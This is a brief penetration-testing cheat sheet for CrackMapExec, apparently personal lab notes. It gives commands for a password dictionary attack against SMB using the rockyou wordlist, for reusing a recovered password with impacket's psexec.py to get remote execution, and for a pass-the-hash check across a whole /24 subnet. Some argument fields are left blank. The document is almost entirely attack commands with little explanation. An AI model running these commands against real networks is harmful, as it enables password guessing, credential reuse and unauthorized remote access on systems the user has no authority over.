# Crackmapexec * Dictionary attack against SMB ```sh cme smb domain.name -u s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ``` * Use the password with `impacket/examples/psexec.py` in the following way ```sh psexec.py domain.name/:@ ``` ## SMB * Check user hash on the network via smb ```sh crackmapexec smb 10.200.x.0/24 -u -d -H ```